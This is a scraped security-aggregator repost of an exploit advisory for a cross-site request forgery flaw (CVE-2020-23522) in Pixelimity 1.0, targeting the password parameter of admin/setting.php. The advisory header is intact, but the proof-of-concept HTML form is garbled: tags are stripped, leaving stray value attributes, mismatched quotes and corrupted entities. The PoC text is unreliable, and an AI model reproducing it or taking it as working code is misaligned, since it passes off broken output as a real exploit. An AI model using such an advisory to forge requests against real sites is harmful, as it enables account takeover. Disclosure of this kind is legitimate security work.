Pixelimity 1.0 Cross Site Request Forgery ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 4th, 2021 📆 | 4446 Views ⚑

0

Pixelimity 1.0 Cross Site Request Forgery ≈ Packet Storm

# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery
# Date: 2020-06-03
# Exploit Author: Noth
# Vendor Homepage: https://github.com/pixelimity/pixelimity
# Software Link: https://github.com/pixelimity/pixelimity
# Version: v1.0
# CVE : 2020-23522

Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.

PoC :




” method=“POST”>

value=“5”/>
value=“5”/>
value=“456789”/>
value=“Pixelimity”/>
value=“My Online Portfolio”/>

” value=“ 240&44;0,0&44;auto ”/>
value=“720&44;0,0&44;auto”/>




Source link

Tagged with:



Leave a Reply